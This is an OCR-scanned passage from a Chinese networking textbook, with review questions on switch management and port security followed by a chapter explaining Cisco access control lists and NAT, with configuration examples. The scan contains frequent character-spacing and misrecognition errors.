将 各 端口 分 配 到 相应 VLAN 中 。 他 把 自己 的 计算 机 分 配 到 vlan 100 中 ,为 了 方便 以 后 可 
以 不 插 配置 线 管理 交换 机 ,他 在 交换 机 上 配置 了 IP 地 址 ,下 列 配置 正确 的 是 ( we 
A. switch(config)#int vlan 1 
switch(config-if) #ip address 192. 168. 1. 1 255. 255. 255. 0 
B. switch(config)#int vlan 1 
switch(config-if) #1ip address 192. 168. 1. 1 255. 255. 255. 0 
switch(config-if) # no shutdown 
C. switch(config)#int vlan 10 
switch(config-if) #1ip address 192. 168. 1. 1 255. 255. 255. 0 
switch(config-if) # no shutdown 
D. switch(config)#int vlan 100 
switch(config-if) #ip address 192. 168. 1. 1 255. 255. 255. 0 
switch(config-if) # no shutdown 


4. 公司 网 管 员 在 查看 设备 以 前 配置 时 ,发 现 交换 机 配置 了 vlan 10 的 IP 地 址 ,该 地 
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址 的 作用 是 ( ”)。 
A. 为 了 使 vlan 10 能 够 和 其 他 内 网 的 主机 互相 通信 
B. 管理 IP 地 址 
C. 交换 机 上 创建 的 每 个 VLAN 必须 配置 IP 地 址 
D. 该 地 址 没什么 作用 ,可 以 将 其 删除 
5. 在 交换 机 上 配置 enable secret level 1 0 cisco, 且 激活 vlan 1 的 IP 地址 ,下 面 说 法 
正确 的 是 ( )s 
A. 可 以 对 交换 机 进行 远程 管理 B. 只 能 进入 交换 机 的 用 户 模式 
C. 不 能 判断 vlan 1 是 否 处 于 up 状态 D. 可 以 对 交换 机 进行 远程 登录 
6. 公司 网 管 员 在 以 Telnet 方式 登录 交换 机 时 提示 “password required, but none 
set”, 原 因 是 ( 姑 
A. 远程 登录 密码 未 设置 
B. 网 管 员 的 主机 与 交换 机 不 在 同一 网 段 
C. 远程 登录 密码 未 作 加 密 处 理 


D. 硬件 问题 
7. 设置 交换 机 的 远程 登录 密码 ,正确 的 命令 是 ( jj 
A. enable password cisco B. enable secret level 15 0 cisco 
C. enable secret level 1 0 cisco D. enable password level 15 0 cisco 


8. 网 管 员 为 了 能 够 以 Telnet 方式 登录 到 交换 机 上 进行 远程 管理 ,配置 交换 机 的 地 
址 ,但 是 进行 登录 时 却 显示 失败 ,通过 show ip interface 命令 查看 IP 地 址 时 ,发 现 端口 
vlan 1 的 状态 为 down, 造 成 这 种 情况 的 可 能 原因 是 ( )。 
A. 该 交换 机 不 支持 Telnet 
B. vlan 1 端口 未 使 用 no shutdown 命令 
C. 未 创建 vlan 1 
D. IP 地 址 应 该 配置 在 物理 端口 上 
9. 要 在 交换 机 上 配置 端口 安全 的 原因 是 ( 和 
A. 为 了 防止 非法 的 用 户 Telnet 到 交换 机 端口 
B. 为 了 限制 二 层 的 广播 帧 传输 到 交换 机 的 端口 上 
C. 为 了 防止 非法 的 用 户 访问 LAN 
D. 为 了 保护 交换 机 的 IP 地 址 和 MAC 地 址 
10. 配置 交换 机 的 端口 安全 存在 的 限制 是 ( 汇 
A. 安全 端口 必须 是 access 端口 ,而 非 trunk 端口 
B. 安全 端口 不 能 是 聚合 端口 (aggregate port) 
C. 安全 端口 不 能 是 span 的 目的 端口 
D. 只 能 在 VLAN 端口 上 配置 端口 安全 
11. 查看 端口 F 0/1 安全 的 命令 是 ( 。 )。 
A. switch# show security-port interface f 0/1 
B. switch# show interface f 0/1 security-port 
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C. switch# show port-security interface f 0/1 
D. switch# show port-security fastethernet 0/1 
12. 以 下 对 交换 机 安全 端口 描述 正确 的 是 ( ds 
A. 交换 机 安全 端口 的 模式 可 以 是 trunk 
B. 交换 机 安全 端口 违例 处 理 方式 有 两 种 
C. 交换 机 安全 端口 模式 是 默认 打开 的 
D. 交换 机 安全 端口 的 模式 必须 是 access 
13. 下 列 不 属于 交换 机 端口 安全 中 安全 违例 处 理 模 式 的 是 ( 5 


A. protect B. restrict C. shutdown D. no shutdown 
14. 交换 机 端口 安全 的 默认 配置 有 ( ) 。 

A. 关闭 端口 安全 B. 最 大 安全 地 址 个 数 是 128 

C. 没有 安全 地 址 D. 违例 处 理 模 式 是 protect 


15. 当 端口 由 于 违规 操作 而 进入 err-disable 状态 后 ,使 用 下 列 ( ) 命 令 可 以 手动 
将 其 恢复 为 up 状态 。 


A. errdisable recovery B. no shutdown 

C. recovery errdisable D. recovery 
16. 交换 机 端口 安全 的 老化 地 址 时 间 最 大 是 ( ) 分 钟 。 

A. 10 B. 256 C720 D. 1440 
17. 在 交换 机 上 配置 端口 安全 ,如 果 违 例 则 丢弃 数据 包 并 发 送 Trap 通知 ,应 采用 

( ) 违 例 处 理 方式 。 

A. protect B. restrict C. shutdown D. no shutdown 
18. 交换 机 安全 端口 接 人 的 安全 地 址 最 大 数 是 ( ) 

A, 32 B. 64 C. 128 D. 256 


19. 如 果 交 换 机 的 一 个 端口 被 配置 为 安全 端口 ,并 开启 了 最 大 连接 数 限制 和 安全 地 
址 绑 定 ,下 列 不 会 产生 安全 违例 提示 的 操作 端口 是 ( 
A. 用 户 受 到 网 关 欺 骗 的 攻击 
B. 当 其 安全 地 址 的 数目 已 经 达到 允许 的 最 大 个 数 
C， 如 果 该 端口 接收 到 一 个 源 地 址 不 属于 端口 安全 地 址 的 数据 包 
D. 用 户 修改 了 自己 的 IP 地址 


二 、 操 作 题 


. 写 出 将 交换 机 接口 开启 为 安全 模式 的 命令 。 

. 写 出 配置 交换 机 端口 的 最 大 连接 数 限制 为 1 的 命令 。 

. 写 出 配置 交换 机 端口 的 违例 处 理 模式 为 shutdown 的 命令 。 

. 写 出 手动 绑 定安 全 MAC 地 址 的 交换 机 端口 安全 配置 的 命令 。 
. 写 出 黏 滞 安 全 MAC 地 址 的 交换 机 端口 安全 配置 的 命令 。 

. 写 出 查看 交换 机 端口 的 安全 配置 的 命令 。 

. 写 出 查看 交换 机 端口 MAC 地 址 表 的 命令 。 

. 写 出 重新 开启 交换 机 因为 违例 被 shutdown 端口 的 命令 。 


oo 下 思 内 性 


16.1 用 户 需求 与 分 析 


能 利用 企业 现 有 路 由 器 配置 访问 控制 列表 (Access Control List, ACL) 和 网 络 地 址 转 
换 (Network Address Translation, NAT) 等 功能 ,在 尽 可 能 最 小 的 经 济 投入 下 实现 对 企 
业 网 络 的 基本 防护 ,这 是 多 数 企业 所 采取 的 基本 保护 方式 。 访 问 控制 是 网 络 安全 防护 和 
保护 的 主要 策略 , 它 的 主要 任务 是 保障 网 络 资源 不 被 非法 使 用 和 访问 , 它 是 保障 网 络 安全 
最 重要 的 核心 策略 之 一 。 访 问 控制 涉及 的 技术 非常 广泛 ,包括 入 网 访问 控制 .网络 权限 控 
制 . 目 录 级 控制 以 及 属性 控制 等 多 种 手段 。 访 问 控制 列表 是 应 用 在 路 由 器 接口 的 指令 列 
表 。 这 些 指 令 列表 用 来 告诉 路 由 器 哪些 数据 包 可 以 接收 .哪些 数据 包 需 要 拒绝 。 至 于 数 
据 包 是 被 接收 还 是 拒绝 ,可 以 由 类 似 于 源 地 址 .目的 地 址 .端口 号 等 特定 的 条 件 来 决定 。 
访问 控制 列表 不 仅 可 以 起 到 控制 网 络 流量 流向 的 作用 ,而 且 在 很 高 程度 上 起 到 保护 网 络 
设备 .服务 器 的 关键 作用 。 作 为 外 网 进入 企业 内 网 的 第 一 道 关 卡 ,路 由 器 上 的 访问 控制 列 
表 成 为 保护 内 网 安全 的 有 效 手段 。 此 外 ,在 路 由 器 的 许多 其 他 配置 任务 中 都 需要 使 用 访 
问 控 制 列 表 , 如 网 络 地 址 转换 、 按 需 拨 号 路 由 (Dial-on-Demand Routing,DDR) .路 由 重 分 
布 (Routing Redistribution) ,策略 路 由 (Policy-Based Routing,PBR) 等 很 多 场合 都 需要 访 
问 控制 列表 。 网 络 地 址 转换 属于 接 和 人 广域网 技术 ,最 初 应 用 主要 是 把 私有 地 址 转换 为 公 
有 地 址 以 解决 互联 网 上 IPv4 地 址 空间 的 匮乏 的 问题 , 它 被 广泛 应 用 于 各 种 类 型 Internet 
接 入 方式 和 各 种 类 型 的 网 络 中 。 通 过 NAT 后 ,内 部 的 私有 IP 主机 系统 的 地 址 被 转换 为 
公有 IP 来 使 用 互联 网 上 的 全 局 路 由 网 络 。 在 进行 地 址 转换 的 同时 ,NAT 可 以 保护 内 部 
网 络 , 由 于 内 部 网 络 使 用 私有 IP 地 址 ,对 互联 网 来 说 是 非 路 由 网 络 地 址 范围 。 这 就 使 得 
公 网 无 法 发 起 对 内 部 私有 IP 地 址 主机 的 连接 ,但 内 部 私有 IP 地 址 主机 可 以 发 起 与 公 网 
的 连接 ,NAT 技术 对 内 部 网 络 起 到 了 隐藏 保护 作用 ,从 而 降低 了 内 部 网 络 受到 攻击 的 风 
险 。 虽然 NAT 可 以 借助 于 某 些 代理 服务 器 来 实现 ,但 是 考虑 到 运算 成 本 和 网 络 性 能 ,很 
多 时 候 都 是 在 路 由 器 上 来 实现 的 。NAT 的 实现 方式 主要 有 3 种 , 即 静 态 NAT(Static 
NAT) .动态 NAT(Dynamic NAT) 和 端口 多 路 复 用 NAT(Overload NAT) 。 
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16.2 预备 知识 
16 2 1 访问 控制 列表 


1. 访问 控制 列表 概述 


访问 控制 列表 是 在 三 层 交换 机 和 路 由 器 上 经 常 采 用 的 一 种 防火 墙 技 术 , 它 可 以 根据 
一 定 的 规则 对 经 过 网 络 设备 的 数据 包 进行 过 滤 。 当 需要 在 路 由 器 上 对 进出 企业 内 部 网 络 
的 协议 数据 进行 过 滤 和 控制 时 ,可 以 采用 路 由 器 中 的 访问 控制 列表 技术 来 配置 过 滤 规 则 。 
它 具 有 以 下 作用 : 在 内 网 部 署 安全 策略 ,保证 内 网 安全 权限 的 资源 访问 ; 内 网 访问 外 网 
时 ,进行 安全 的 数据 过 滤 ; 防止 常见 病毒 .木马 攻击 对 用 户 系统 的 破坏 。 所 以 说 ,掌握 
ACL 技术 对 于 网 络 管理 员 非 常 重要 。 其 实 ,ACL 的 配置 就 和 普通 的 规则 一 样 ,需要 两 个 
步骤 : 四 定义 规则 ; @ 将 规则 应 用 于 端口 。 在 应 用 于 端口 时 ,需要 注意 是 入 栈 应 用 还 是 
出 栈 应 用 。 从 安全 的 角度 看 ,ACL 可 以 基于 源 地 址 、 目 标 地 址 或 服务 类 型 允许 或 拒绝 为 
特定 的 用 户 提 供 资源 ,有 可 能 只 允许 FTP 流量 提供 给 特定 的 一 台 主 机 ,或 者 只 允许 
HTTP 流量 进入 Web 服务 器 而 不 是 E-mail 服务 器 。IP 访问 控制 列表 可 以 在 路 由 器 上 
配置 ,也 可 以 在 三 层 交换 机 上 配置 ,在 路 由 器 上 配置 的 访问 控制 列表 是 由 编号 来 命名 的 ， 
也 叫 编号 访问 控制 列表 ; 在 三 层 交 换 机 上 配置 的 访问 控制 列表 是 由 字符 串 来 命名 的 ,也 
叫 命名 访问 控制 列表 。 访 问 控制 列表 在 思科 路 由 器 上 常用 的 有 两 类 : 标准 IP 访问 控制 
列表 和 扩展 IP 访问 控制 列表 。 


2. 标准 IP 访问 控制 列表 


1) 标准 IP 访问 控制 列表 介绍 

标准 IP 访问 控制 列表 是 在 路 由 器 上 建立 的 访问 控制 列表 ,其 编号 取 值 为 0 一 99。 标 
准 了 访问 控制 列表 只 根据 源 IP 地 址 过 滤 流 量 , 这 个 IP 地 址 可 以 是 一 台 主 机 、 整 个 网 络 ， 
或 者 特定 网 络 上 的 特定 主机 。 工 作 过 程 为 : 当 路 由 器 收 到 一 个 数据 包 时 ,根据 该 数据 包 
的 源 IP 地址 从 访问 控制 列表 上 面 第 一 条 语句 开始 逐条 检查 各 条 语句 。 如 果 检 查 到 匹配 
语句 ,根据 语句 中 是 允许 还 是 拒绝 流量 通过 来 处 理 该 数据 包 ; 如 果 检 查 到 最 后 语句 还 没 
有 匹配 , 则 丢弃 该 数据 包 。 

注意 : 在 标准 IP 访问 控制 列表 或 扩展 IP 访问 控制 列表 的 末尾 ,总 有 一 个 隐 仿 的 
deny all 语句 。 这 意味 着 如 果 数 据 包 源 地 址 与 任何 允许 语句 不 匹配 , 则 隐 含 的 deny all 语 
句 将 会 拒绝 该 数据 包 通 过 。 

2) 定义 标准 了 P 访问 控制 列表 

所 有 标准 访问 IP 控制 列表 都 是 在 全 局 配置 模式 下 设置 的 ,建立 标准 IP 访问 控制 列 
表 的 格式 如 下 。 


Router(config)#access— list listnumber {permit|deny} source— address [ source 一 mask] 


其 中 ,listnumber 是 标准 IP 访问 控制 列表 的 序号 ,范围 是 0 一 99。permit| deny 表示 
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标准 IP 访问 控制 列表 是 允许 还 是 拒绝 满足 条 件 的 数据 包 通 过 。source-address 是 被 过 滤 
的 源 数 据 包 地 址 。source-mask 是 通 配 屏蔽 码 ,1 表示 不 检查 ,0 表示 必须 匹配 位 。 其 他 
可 以 提供 的 选项 参数 是 any 和 host, 它 们 可 以 用 于 permit 和 deny 之 后 来 说 明 任何 主机 
或 一 台 特 定 主机 。any 等 同 于 通 配 屏蔽 码 255. 255. 255. 255, host 等 同 于 屏蔽 
码 0.0.0.0。 

此 格式 表示 允许 或 拒绝 来 自 指定 网 络 的 数据 包 , 该 网 络 由 源 IP 地 址 (source- 
address) 和 通 配 屏蔽 码 (source-mask) 指 定 。 在 思科 路 由 器 中 访问 控制 列表 仅 对 源 地 址 进 
行 检查 。 标 准 IP 访问 列表 的 例子 如 下 。 

例 16-1 定义 标准 耳 访问 控制 列表 10, 人 允许 来 自 网 络 192. 168. 1.0 的 流量 通过 。 


Router(config) # access 一 list 10 permit 192.168.1.0 0.0.0.255 

例 16-2 ”定义 标准 IP 访问 控制 列表 20 ,拒绝 来 自 网 络 192. 168. 31.0 的 流量 通过 。 

Router(config) # access- list 20 deny 192.168.31.0 0.0.0.255 

例 16-3 定义 标准 卫 访问 控制 列表 30, 允许 来 自主 机 192. 168. 2. 3 的 流量 通过 。 

Router(config) # access 一 list 30 permit host 192.168.2.3 

例 16-4 定义 标准 IP 访 问 控制 列表 40 ,拒绝 来 自主 机 192. 168. 32. 3 的 流量 通过 。 

Router(config)#access— list 40 deny host 192.168.32.3 

例 16-5 定义 标准 访问 控制 列表 50, 拒 绝 从 192. 168. 0. 0 到 192. 168. 255. 255 的 流 
量 通过 ,但 允许 从 192. 167. 0.0 到 192. 168. 167. 255. 255 的 流量 通过 。 


Router(config) # access- list 50 deny 192.168.0.0 0.0.255.255 

Router(config) # access 一 list 50 permit 192.167.0.0 0.0.255.255 

3) 应 用 标准 IP 访问 控制 列表 

一 旦 建立 了 标准 IP 访问 控制 列表 ,需要 将 它们 应 用 到 路 由 器 的 一 个 端口 上 。 应 用 到 
一 个 端口 上 可 以 选择 入 栈 或 者 出 栈 两 个 方向 。 对 于 某 一 个 端口 , 当 要 从 设备 外 的 数据 经 
过 端口 流入 设备 内 时 做 访问 控制 ,就 是 入 栈 应 用 ; 当 要 从 设备 内 的 数据 经 过 端口 流出 设 
备 时 做 访问 控制 ,就 是 出 栈 应 用 。 路 由 器 一 个 端口 只 能 应 用 一 个 标准 IP 访问 控制 列表 。 

例如 ,以 下 命令 将 访问 控制 列表 10 应 用 到 路 由 器 的 端口 F 0/1 的 和 人 栈 方向 上 。 

Router(config) # interface fastethernet 0/1 

Router(config— if) # ip access - group 10 in 

Router(config— if)#end 

4) 查看 标准 IP 访问 控制 列表 

配置 完 标准 卫 访问 控制 列表 后 ,可 以 使 用 下 列 命令 来 检验 。 


Router# show access — lists 
3. 命名 的 IP 访问 控制 列表 
在 三 层 交 换 机 上 配置 命名 的 IP 访问 控制 列表 ,也 是 采用 定义 ACL、 在 端口 上 应 用 








ACL ,查看 ACL 等 步骤 进行 。 

在 三 层 交换 机 特权 模式 下 ,可 以 通过 以 下 步骤 来 创建 一 个 命名 的 IP 访问 控制 列表 。 

(1) Switch#configure terminal: 进入 全 局 配置 模式 。 

(2) Switch(config) #1ip access-list standard {name)}, 

(3) Switch(config-std-nac) # deny {source source-mask|host source|any} 或 permit 
{source source-mask| host source|any): permit 表示 可 以 通过 ,deny 表示 不 可 以 通过 ， 
source 是 要 被 过 滤 的 数据 包 源 地 址 ,source-mask 是 通 配 屏蔽 码 , 指 出 哪些 位 进行 匹配 ,1 
表示 允许 这 些 位 不 同 ,0 表示 这 些 位 必须 匹配 。host source 表示 一 台 源 主机 ,其 source- 
mask 为 0. 0. 0. 0,any 表示 任意 主机 , 即 source 为 0. 0. 0. 0, source-mask 为 255. 255. 
255..255, 

(4) Switch(config-std-nac) 并 exit。 

(5) Switch(config) # interface vlan n: n 是 指 vlan n, 以 实现 进入 SVI 模式 。 

(6) Switch(config-if) #ip access-group {name) [out|in]: 应 用 访问 控制 列表 ,name 
为 访问 控制 列表 的 名 称 ,in 或 out 是 控制 端口 流量 方向 。 

例如 ,在 三 层 交换 机 上 配置 访问 控制 列表 ,实现 禁止 192. 168. 2.0 网 段 上 主机 发 出 的 
数据 ,而 允许 其 他 任意 主机 。 

Switch# configure terminal // 进 入 全 局 配置 模式 

Switch(config) # ip access— list standard deny 2.0 

Switch(config - std - nac) # deny 192.168.2.0 0.0.0.255 

Switch(config - std - nac)# permit any 

Switch(config - std— nac)#exit 

Switch(config) # interface vlan 2 

Switch(config - 证 ) # ip access - group deny 2.0 in 

Switch(config - if)#end 

Switch# show access — lists // 查 看 标准 访问 控制 列表 


4. 扩展 IP 访问 控制 列表 


1) 扩展 IP 访问 控制 列表 

扩展 IP 访问 控制 列表 与 标准 卫 访问 控制 列表 一 样 ,也 是 在 路 由 器 上 创建 的 ,其 编号 
范围 是 100 一 199。 扩 展 IP 访问 控制 列表 可 以 基于 数据 包 源 IP 地 址 、 目 的 了 P 地 址 、 协 议 
及 端口 号 等 信息 来 过 滤 流 量 。 当 路 由 器 收 到 一 个 数据 包 时 ,路 由 器 根据 数据 包 的 源 地 址 、 
目的 IP 地 址 ,协议 及 端口 号 等 信息 从 访问 控制 列表 中 自 上 而 下 检查 控制 语句 。 如 果 查 到 
与 一 条 permit 语句 匹配 , 则 允许 该 数据 包 通 过 ; 如 果 与 一 条 deny 语句 匹配 , 则 该 数据 包 
丢弃 ; 如 果 检 查 到 最 后 也 没有 一 条 匹配 , 则 该 数据 包 也 被 丢弃 。 一 旦 控制 列表 允许 数据 
包 通 过 ,路 由 器 将 数据 包 的 目的 地 址 与 路 由 器 上 的 路 由 表 相 比较 ,就 可 以 把 数据 包 路 由 到 
它 的 目的 地 。 

2) 配置 扩展 IP 访问 控制 列表 

和 标准 IP 访问 控制 列表 一 样 ,扩展 IP 访问 控制 列表 也 在 全 局 模式 下 输入 ,格式 
如 下 。 
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Router(config) # access - list listnumber {permit|deny} protocol source source — wildcard— 





mask destination destination - wildcard— mask [operator operand] 


其 中 ,listnumber 为 规则 序号 ,扩展 IP 访问 控制 列表 的 规则 序号 范围 为 100 一 199。 
permit 和 deny 表示 允许 或 禁止 满足 该 规则 的 数据 包 通 过 。protocol 为 0 一 255 的 任意 协 
议 号 ,对 于 常见 协议 (如 IP、TCP、UDP 等 ), 可 以 直观 地 指定 协议 名 , 若 指定 为 IP, 则 该 规 
则 对 所 有 IP 数据 包 都 起 作用 。operator operand 用 于 指定 端口 范围 ,默认 为 全 部 端口 号 
0 一 65535, 只 有 TCP .UDP 协议 需要 指定 端口 范围 。 在 指定 端口 号 portnumer 时 ,对 于 常 
见 的 端口 号 ,可 以 用 相应 的 助 记 符 来 代替 实际 数字 。 

3) 应 用 扩展 IP 访问 控制 列表 

在 路 由 器 端口 上 应 用 扩展 IP 访问 控制 列表 的 命令 格式 如 下 。 

Router(config) # ip access - group listnumber in // 在 指定 端口 上 过 滤 接 收报 文 规则 

Router(config) # no ip access - group listnumber in  // 取 消 端口 上 过 滤 接 收报 文 规则 

Router (config) # ip access - group listnumber out // 在 指定 端口 上 过 滤 发 送 报 文 规则 

Router(config) # no ip access 一 group listnumber out  // 取 消 端口 上 过 滤 发 送 报 文 规则 

注意 : 参数 in 和 out 表示 是 入 栈 还 是 出 栈 , 如 果 想 让 访问 列表 对 两 个 方向 都 有 用 , 则 
两 个 参数 都 要 加 上 。 对 于 每 个 协议 的 每 个 端口 的 每 个 方向 ,只 能 应 用 一 个 访问 列表 。 

例如 ,在 路 由 器 0/0 端口 上 配置 访问 控制 列表 100, 实 现 只 允许 从 192. 168.0.0 网 
段 的 主机 向 202. 36. 161. 0 网 段 的 主机 发 送 WWW 报 文 ,禁止 其 他 报 文通 过 。 


Router(config) # access 一 list 100 permit tcp 192.168.0.0 0.0.255.255 202.36.161.0 
0.0.0.255 eq www 

Router (config) # interface fastethernet 0/0 

Router(config - 许 ) # ip access - group 100 in 

Router(config - if)#exit 





5. 命名 的 扩展 IP 访问 控制 列表 


创建 命名 的 扩展 IP 访问 控制 列表 ,在 三 层 交 换 机 特权 模式 下 ,通过 以 下 步骤 来 实现 。 

(1) Switch# configure terminal: 进入 全 局 配置 模式 。 

(2) Switch(Cconfig) # ip access-list extended {name): 用 名 字 定 义 一 个 命名 扩展 访 
问 列表 。 

(3) Switch(config-ext-nacl) # {deny| permit}) protocol {source source-wildcard | host 
source| any} [operator port] {destination-wildcard | host destination | any} [ operator 
port]: 定义 扩展 访问 控制 列表 条 件 , 其 中 deny 为 禁止 通过 ,permit 为 允许 通过 ; protocol 
为 协议 类 型 ,tcp 为 TCP 数据 流 ,udp 为 UDP 数据 流 ,ip 为 任务 IP 数据 流 ; source 为 源 
数据 包 地 址 , source-wildcard 为 源 IP 地 址 通配符 ,host source 代表 一 台 源 主机 ,其 
source-wildcard 为 0. 0. 0.0,any 代表 任意 主机 ; operator 为 操作 符 , 只 能 为 eq,port 为 十 
进 制 端口 号 ,范围 是 0 一 65535。 


Switch(config - ext — nacl)#exit 
Switch(config) # interface vlan n 
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Switch(config- 诗 ) # ip access - group [name] [in|out] // 应 用 访问 控制 列表 

Switch(config — if)#end 

例如 ,以 下 命令 在 三 层 交换 机 上 配置 命名 的 扩展 IP 访问 控制 列表 ,实现 只 允许 192. 
168. 2.0 网 段 上 的 主机 访问 IP 地 址 为 172. 16. 1. 100 上 的 Web 服务 器 ,禁止 其 他 任何 主 
机 访问 。 

Switch(config) # ip access — list extended allow 2.0 

Switch(config— ext — nacl)#permit tcp 192.168.2.0 0.0.0.255 host 172.16.1.100 eq www 

Switch(config— ext — nacl)#exit 

Switch(config) # interface vlan 2 

Switch(config - 证 ) # ip access - group allow 2.0 in 

Switch(config — if)#end 


6. 基于 时 间 的 访问 控制 列表 
基于 时 间 的 访问 控制 列表 使 管理 员 可 以 依据 时 间 来 控制 用 户 对 网 络 资源 的 访问 。 为 了 
实现 这 一 功能 ,必须 先 创建 一 个 time-range 端口 来 指明 时 间 与 日 期 。 与 其 他 端口 一 样 ,time- 


range 端口 是 通过 名 称 来 标志 的 。 然 后 ,将 time-range 端口 与 对 应 的 ACL 关联 起 来 。 
(1) 校正 路 由 器 时 钟 。 为 了 有 效 地 实现 基于 时 间 的 访问 控制 列表 ,有 必要 校正 路 由 


器 时 钟 ,具体 操作 如 下 。 
Router > enable // 进 入 特权 模式 
Router # clock set hh:mm:ss date month year or clock set hh:mm:ss month date year // 设 置 时 钟 
Router# clock update - calendar // 更 新 路 由 器 时 钟 
Router # end // 退 出 特权 模式 


(2) 创建 并 定义 time-range 端口 。 创 建 时 间接 口 、 定 义 时 间 范 围 的 操作 如 下 。 


Router# configure terminal // 进 入 全 局 模式 

Router(config) # time— range name // 创 建 端口 

Router(config — time - range) # absolute [start time date] [end time date] and/or periodic 
days - of - the - week hh:mm to [days -of - the- week] hh:mm  // 设 置 时 间 有 段 


(3) 关联 time-range 端口 与 访问 控制 列表 。 只 允许 扩展 访问 控制 列表 关联 time- 
range 端口 ,具体 操作 如 下 。 


Router # configure terminal // 进 入 特权 模式 

Router(config) # access - list {deny|permit} protocol source src - wildcard destination desti 一 
wildcard [time — range name] // 并 将 time- range 关联 到 ACL 
Router(config) # exit // 退 出 全 局 配置 模式 


注意 : Packet Tracer 软件 不 支持 time-range 命令 ,所 以 只 能 在 真实 路 由 器 上 配置 。 
了 从 22 网络 地 址 转换 

1. 网 络 地 址 转换 (NAT) 概 述 

随 着 Internet 技术 的 发 展 , 越 来 越 多 的 用 户 加 入 到 互联 网 中 ,无 论 在 办 公 室 .学校 还 
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是 家 庭 , 人 们 都 需要 接 入 互联 网 进行 办 公 、 学 习 和 娱乐 。 然 而 互联 网 目前 面临 的 重要 问题 
是 IP 地 址 需求 急剧 膨胀 ,IP 地 址 空间 衰竭 。 而 网 络 地 址 转换 的 使 用 则 缓解 了 该 问题 ,使 
一 个 组 织 的 IP 网 络 呈 现 给 外 部 网 络 的 IP 与 正在 使 用 的 内 部 IP 完全 不 同 ,这 样 一 个 组 织 
就 可 以 将 本 来 非 全 局 可 路 由 IP 地 址 通过 NAT 后 , 变 为 全 局 可 路 由 IP 地 址 ,实现 了 原 有 
网 络 与 互联 网 的 连接 ,而 不 需要 重新 给 每 台 计 算 机 分 配 IP 地 址 。NAT 的 应 用 主要 包括 
以 下 两 个 方面 。 

(1) 主机 没有 全 局 唯一 的 可 路 由 IP 地 址 , 却 需要 与 互联 网 连接 。NAT 使 得 用 非 注 
册 IP 地 址 构建 的 私有 网 络 可 以 与 互联 网 联通 ,这 也 是 NAT 重要 的 应 用 之 一 。NAT 在 
连接 内 部 网 络 和 外 部 网 络 的 边界 路 由 器 上 进行 配置 , 当 内 部 网 络 主机 访问 外 部 网 络 时 ,将 
内 部 网 络 地 址 转换 为 全 局 唯一 的 可 路 由 IP 地 址 。 

(2) 当 需 要 做 TCP 流量 的 均衡 又 不 想 购买 昂贵 的 专业 设备 时 ,就 可 以 将 单个 全 局 IP 
地 址 对 应 到 多 个 内 部 IP 地 址 ,这 样 NAT 就 可 以 通过 轮 询 方式 实现 TCP 流量 的 负载 
均衡 。 

应 用 NAT 时 存在 的 问题 包括 以 下 几 方 面 。 

(1) 影响 网 络 速度 。NAT 的 应 用 可 能 会 使 NAT 设备 成 为 网 络 瓶颈 , 随 着 网 络 设备 
的 软 、 硬 件 发 展 , 该 问题 会 逐步 得 到 解决 。 

(2) 跟 某 些 应 用 不 兼容 。 如 果 一 些 应 用 在 有 效 载 荷 中 协商 下 次 会 话 的 IP 地 址 和 端 
口号 ,NAT 将 无 法 对 内 由 IP 地 址 进行 转换 ,造成 这 些 应 用 不 能 正常 进行 。 

(3) NAT 不 能 处 理 IP 报头 加 密 的 报 文 。 

(4) 无 法 实现 对 IP 端 到 端的 路 径 跟 踪 ,经 过 NAT 地 址 转换 后 ,对 数据 包 的 路 径 跟 踪 
将 变 得 十 分 困难 。 


2. NAT 基本 概念 








(1) 内 部 网 络 (Inside) : 在 内 部 网 络 每 台 计 算 机 分 配 一 个 内 部 IP 地 址 ,但 与 外 部 网 
络 通信 时 ,又 表现 为 另外 一 个 地 址 。 每 台 主 机 的 前 一 个 地 址 成 为 内 部 本 地 地 址 ,后 一 个 地 
址 成 为 外 部 全 局 地 址 。 

(2) 外 部 网 络 (Outside) : 是 指 内 部 网 络 需 要 连接 的 网 络 ,一 般 指 互联 网 。 

(3) 内 部 本 地 地 址 (Inside Local Address) : 是 指 分 配给 内 部 网 络 主机 的 IP 地 址 ,该 
地 址 可 能 是 非法 的 未 向 相关 机 构 注册 的 IP 地 址 ,也 可 能 是 合法 的 私有 网 络 地 址 。 

(4) 内 部 全 局 地 址 (Inside Global Address) : 合法 的 全 局 可 路 由 地 址 ,在 外 部 网 络 看 
来 , 它 代 表 着 一 个 或 多 个 内 部 本 地 地 址 。 

(5) 外 部 本 地 地 址 (Outside Local Address): 外 部 网 络 的 主机 在 内 部 网 络 中 表现 的 
IP 地 址 ,该 地 址 是 内 部 可 路 由 地 址 ,一 般 不 是 注册 的 全 局 可 路 由 地 址 。 

(6) 外 部 全 局 地 址 (Outside Global Address) : 外 部 网 络 分 配给 外 部 主机 的 IP 地 址 ， 
该 地 址 称 为 全 局 可 路 由 地 址 。 


3. NAT 的 分 类 
根据 实际 使 用 的 环境 与 需求 ,NAT 主要 有 以 下 3 种 类 型 的 应 用 。 
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1) 一 对 一 的 静态 NAT 

内 部 私有 地 址 与 给 定 的 公有 地 址 进行 一 对 一 的 映射 转换 ,并 且 为 双向 的 转换 。 这 种 
类 型 的 NAT 可 应 用 于 防火 墙 DMZ 端口 或 内 部 网 中 对 外 提供 服务 的 服务 器 ,如 Web、 
DNS FTP 等 。 例 如 , Web 服务 器 内 部 私有 IP 地 址 为 192. 168. 2. 100, 一 对 一 的 静态 
NAT 为 200.1.1.3 等 。 

2) 多 对 多 的 动态 NAT 地 址 池 转 换 

在 企业 网 络 接 人 互联 网 中 ,一 般 都 可 以 从 ISP 获取 一 个 连续 的 公 网 IP 地 址 段 ,如 
200. 1.1.0/29。 其 中 ,可 用 的 主机 公 网 IP 地 址 为 200. 1. 1. 1 一 200. 1. 1. 6, 其 中 一 个 为 
ISP 的 网 关 地 址 (如 200. 1.1. 1) ,一 个 配置 给 企业 路 由 器 或 防火 墙 的 外 网 端口 的 公 网 下 
地 址 (如 200. 1.1.2) ,其 余 公 网 IP 地 址 如 200. 1. 1. 3 一 200. 1. 1.6 可 用 于 对 内 部 的 多 台 主 
机 进行 多 对 多 的 转换 。 如 192. 168. 1. 2 一 192. 168. 1. 10 对 应 转换 为 地 址 池 200. 1. 1. 3 一 
200. 1.1.6 中 的 公 网 地 址 。 由 于 企业 网 络 内 部 的 主机 数量 往往 多 于 地 址 池 ,不 能 保证 所 
有 内 部 主机 同时 访问 公 网 ,所 以 动态 NAT 地 址 池 转 换 多 与 后 面 的 PAT 进行 结合 实现 对 
地 址 池 的 充分 利用 。 

3) 基于 端口 多 路 复 用 的 NAT 

这 种 方式 下 多 个 私有 地 址 对 应 一 个 公 网 IP 地 址 。 多 个 内 部 私有 地 址 变换 为 统一 的 
